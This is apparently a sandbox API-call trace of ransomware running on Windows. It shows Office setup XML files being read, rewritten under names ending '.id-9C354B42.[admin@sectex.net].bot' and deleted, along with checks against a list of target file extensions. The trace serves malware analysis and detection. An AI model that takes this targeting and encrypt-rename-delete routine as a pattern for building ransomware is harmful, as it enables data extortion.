	[0038.697] WriteFile (in: hFile=0x1c0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x5b0, lpOverlapped=0x0) returned 1
	[0038.698] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0038.698] WriteFile (in: hFile=0x1c0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0038.698] SetEndOfFile (hFile=0x1c0) returned 1
	[0038.698] CloseHandle (hObject=0x1c0) returned 1
	[0038.699] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.699] SetEndOfFile (hFile=0x1a0) returned 1
	[0038.700] CloseHandle (hObject=0x1a0) returned 1
	[0038.700] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0038.700] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml")) returned 1
	[0038.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108
	[0038.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108
	[0038.700] lstrlenW (lpString=".doc") returned 4
	[0038.700] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.700] lstrlenW (lpString=".docx") returned 5
	[0038.700] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0038.700] lstrlenW (lpString=".pdf") returned 4
	[0038.700] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.700] lstrlenW (lpString=".xls") returned 4
	[0038.700] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.700] lstrlenW (lpString=".xlsx") returned 5
	[0038.700] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0038.700] lstrlenW (lpString=".ppt") returned 4
	[0038.700] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108
	[0038.700] lstrlenW (lpString=".zip") returned 4
	[0038.700] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.701] lstrlenW (lpString=".rar") returned 4
	[0038.701] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.701] lstrlenW (lpString=".bz2") returned 4
	[0038.701] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.701] lstrlenW (lpString=".7z") returned 3
	[0038.701] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108
	[0038.701] lstrlenW (lpString=".dbf") returned 4
	[0038.701] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108
	[0038.701] lstrlenW (lpString=".1cd") returned 4
	[0038.701] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108
	[0038.701] lstrlenW (lpString=".jpg") returned 4
	[0038.701] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108
	[0038.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108
	[0038.701] lstrlenW (lpString=".doc") returned 4
	[0038.701] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.701] lstrlenW (lpString=".docx") returned 5
	[0038.701] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0038.701] lstrlenW (lpString=".pdf") returned 4
	[0038.701] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.701] lstrlenW (lpString=".xls") returned 4
	[0038.701] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.701] lstrlenW (lpString=".xlsx") returned 5
	[0038.701] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0038.701] lstrlenW (lpString=".ppt") returned 4
	[0038.701] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108
	[0038.701] lstrlenW (lpString=".zip") returned 4
	[0038.701] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.701] lstrlenW (lpString=".rar") returned 4
	[0038.701] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.702] lstrlenW (lpString=".bz2") returned 4
	[0038.702] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.702] lstrlenW (lpString=".7z") returned 3
	[0038.702] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108
	[0038.702] lstrlenW (lpString=".dbf") returned 4
	[0038.702] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108
	[0038.702] lstrlenW (lpString=".1cd") returned 4
	[0038.702] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108
	[0038.702] lstrlenW (lpString=".jpg") returned 4
	[0038.702] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.702] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0038.702] lstrlenW (lpString="SETUP.XML") returned 9
	[0038.702] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0038.702] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=1872) returned 1
	[0038.702] CloseHandle (hObject=0x1a0) returned 1
	[0038.702] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml")) returned 0x20
	[0038.703] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0038.703] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0038.703] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.703] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.703] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0038.703] GetLastError () returned 0x0
	[0038.703] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x750, lpOverlapped=0x0) returned 1
	[0039.104] WriteFile (in: hFile=0x1c0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x760, lpOverlapped=0x0) returned 1
	[0039.117] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0039.117] WriteFile (in: hFile=0x1c0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0039.117] SetEndOfFile (hFile=0x1c0) returned 1
	[0039.117] CloseHandle (hObject=0x1c0) returned 1
	[0039.118] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.118] SetEndOfFile (hFile=0x1a0) returned 1
	[0039.118] CloseHandle (hObject=0x1a0) returned 1
	[0039.118] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0039.119] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml")) returned 1
	[0039.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103
	[0039.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103
	[0039.119] lstrlenW (lpString=".doc") returned 4
	[0039.119] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.119] lstrlenW (lpString=".docx") returned 5
	[0039.119] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0039.119] lstrlenW (lpString=".pdf") returned 4
	[0039.119] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.119] lstrlenW (lpString=".xls") returned 4
	[0039.119] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.119] lstrlenW (lpString=".xlsx") returned 5
	[0039.119] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0039.119] lstrlenW (lpString=".ppt") returned 4
	[0039.119] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103
	[0039.119] lstrlenW (lpString=".zip") returned 4
	[0039.119] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.119] lstrlenW (lpString=".rar") returned 4
	[0039.119] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.119] lstrlenW (lpString=".bz2") returned 4
	[0039.119] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.119] lstrlenW (lpString=".7z") returned 3
	[0039.119] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103
	[0039.119] lstrlenW (lpString=".dbf") returned 4
	[0039.120] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103
	[0039.120] lstrlenW (lpString=".1cd") returned 4
	[0039.120] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103
	[0039.120] lstrlenW (lpString=".jpg") returned 4
	[0039.120] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103
	[0039.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103
	[0039.120] lstrlenW (lpString=".doc") returned 4
	[0039.120] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.120] lstrlenW (lpString=".docx") returned 5
	[0039.120] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0039.120] lstrlenW (lpString=".pdf") returned 4
	[0039.120] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.120] lstrlenW (lpString=".xls") returned 4
	[0039.120] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.120] lstrlenW (lpString=".xlsx") returned 5
	[0039.120] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0039.120] lstrlenW (lpString=".ppt") returned 4
	[0039.120] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103
	[0039.120] lstrlenW (lpString=".zip") returned 4
	[0039.120] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.120] lstrlenW (lpString=".rar") returned 4
	[0039.120] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.120] lstrlenW (lpString=".bz2") returned 4
	[0039.120] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.120] lstrlenW (lpString=".7z") returned 3
	[0039.120] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103
	[0039.120] lstrlenW (lpString=".dbf") returned 4
	[0039.120] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103
	[0039.121] lstrlenW (lpString=".1cd") returned 4
	[0039.121] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103
	[0039.121] lstrlenW (lpString=".jpg") returned 4
	[0039.121] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.121] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0039.121] lstrlenW (lpString="Proofing.XML") returned 12
	[0039.121] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0039.653] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=811) returned 1
	[0039.653] CloseHandle (hObject=0x1c0) returned 1
	[0039.653] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml")) returned 0x20
	[0039.653] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.653] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0039.653] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.653] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.653] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0039.654] GetLastError () returned 0x0
	[0039.654] ReadFile (in: hFile=0x1c0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x32b, lpOverlapped=0x0) returned 1
	[0039.658] WriteFile (in: hFile=0x1f4, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x330, lpOverlapped=0x0) returned 1
	[0039.659] ReadFile (in: hFile=0x1c0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0039.659] WriteFile (in: hFile=0x1f4, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0039.659] SetEndOfFile (hFile=0x1f4) returned 1
	[0039.659] CloseHandle (hObject=0x1f4) returned 1
	[0039.660] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.660] SetEndOfFile (hFile=0x1c0) returned 1
	[0039.661] CloseHandle (hObject=0x1c0) returned 1
	[0039.661] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0039.661] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml")) returned 1
	[0039.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107
	[0039.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107
	[0039.661] lstrlenW (lpString=".doc") returned 4
	[0039.661] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.661] lstrlenW (lpString=".docx") returned 5
	[0039.661] lstrcmpiW (lpString1=".docx", lpString2="g.XML") returned -1
	[0039.661] lstrlenW (lpString=".pdf") returned 4
	[0039.661] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.661] lstrlenW (lpString=".xls") returned 4
	[0039.661] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.661] lstrlenW (lpString=".xlsx") returned 5
	[0039.661] lstrcmpiW (lpString1=".xlsx", lpString2="g.XML") returned -1
	[0039.661] lstrlenW (lpString=".ppt") returned 4
	[0039.662] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.662] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107
	[0039.662] lstrlenW (lpString=".zip") returned 4
	[0039.662] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.662] lstrlenW (lpString=".rar") returned 4
	[0039.662] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.662] lstrlenW (lpString=".bz2") returned 4
	[0039.662] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.662] lstrlenW (lpString=".7z") returned 3
	[0039.662] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.662] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107
	[0039.662] lstrlenW (lpString=".dbf") returned 4
	[0039.662] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.662] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107
	[0039.662] lstrlenW (lpString=".1cd") returned 4
	[0039.662] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.662] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107
	[0039.662] lstrlenW (lpString=".jpg") returned 4
	[0039.662] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.662] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107
	[0039.662] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107
	[0039.662] lstrlenW (lpString=".doc") returned 4
	[0039.662] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.662] lstrlenW (lpString=".docx") returned 5
	[0039.662] lstrcmpiW (lpString1=".docx", lpString2="g.XML") returned -1
	[0039.662] lstrlenW (lpString=".pdf") returned 4
	[0039.662] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.663] lstrlenW (lpString=".xls") returned 4
	[0039.663] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.663] lstrlenW (lpString=".xlsx") returned 5
	[0039.663] lstrcmpiW (lpString1=".xlsx", lpString2="g.XML") returned -1
	[0039.663] lstrlenW (lpString=".ppt") returned 4
	[0039.663] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107
	[0039.663] lstrlenW (lpString=".zip") returned 4
	[0039.663] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.663] lstrlenW (lpString=".rar") returned 4
	[0039.663] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.663] lstrlenW (lpString=".bz2") returned 4
	[0039.663] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.663] lstrlenW (lpString=".7z") returned 3
	[0039.663] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107
	[0039.663] lstrlenW (lpString=".dbf") returned 4
	[0039.663] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107
	[0039.663] lstrlenW (lpString=".1cd") returned 4
	[0039.663] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107
	[0039.663] lstrlenW (lpString=".jpg") returned 4
	[0039.663] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.663] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0039.663] lstrlenW (lpString="ProPlusrWW.XML") returned 14
	[0039.663] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0039.669] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=16852) returned 1
	[0039.669] CloseHandle (hObject=0x1f4) returned 1
	[0039.669] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml")) returned 0x20
